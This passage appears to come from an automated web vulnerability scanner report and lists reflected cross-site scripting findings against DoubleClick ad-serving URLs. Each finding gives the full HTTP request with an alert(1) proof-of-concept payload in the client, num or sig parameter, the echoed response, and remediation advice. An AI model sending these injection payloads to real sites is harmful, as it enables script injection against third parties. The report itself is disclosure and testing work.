The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75a94'-alert(1)-'780ad4b53e3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-522096049512237575a94'-alert(1)-'780ad4b53e3&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:19:23 GMT
Content-Length: 38065

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-522096049512237575a94'-alert(1)-'780ad4b53e3&adurl=http://ad.doubleclick.net/2493053/redirect_nexuss_gdn.html">
...[SNIP]...

4.61. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c67b6"-alert(1)-"4472742a4be was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1c67b6"-alert(1)-"4472742a4be&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:17:21 GMT
Content-Length: 7140

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1c67b6"-alert(1)-"4472742a4be&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

4.62. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53df6"-alert(1)-"7d154b67633 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg53df6"-alert(1)-"7d154b67633&client=ca-pub-5220960495122375&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/ge